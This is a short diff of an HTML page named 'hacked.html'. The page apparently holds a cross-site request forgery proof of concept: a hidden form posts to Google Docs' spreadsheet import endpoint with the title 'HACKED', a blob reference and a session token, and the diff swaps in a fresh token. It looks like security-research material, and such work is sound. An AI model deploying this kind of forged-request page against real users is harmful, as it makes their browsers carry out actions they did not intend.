--- a/hacked.html
+++ b/hacked.html
@@ -4,7 +4,7 @@
     <form action="https://docs.google.com/spreadsheets/import/inline">
       <input type="hidden" name="title" value="HACKED" />
       <input type="hidden" name="blobRef" value="AGLjGmle&#45;hZBKk0E81BGGs1Ld52LYxTvNJ&#45;iOc&#45;ten&#45;YSdPRr9OHxEDQGwgyf&#95;QGPwvrMu&#95;S8ws&#45;PGJhh378X39VvjjyYFbvnK70AbNdXeAbzKfBqfGjXej2C7SJUgtcwOcUOw2dozTZo&#95;PIpR&#45;vLq&#45;R&#95;C9Nb9Tc2Q&#61;&#61;" />
-      <input type="hidden" name="token" value="AC4w5VgO&#45;m85Ct1ABV9QKJTuojXHxD&#45;Vrg&#58;1751867652222" />
+      <input type="hidden" name="token" value="AC4w5VhX&#95;ZdnOBQvuown2GouTI3W0gToBA&#58;1751877489538" />
       <input type="submit" value="Submit request" />
     </form>
     <script>
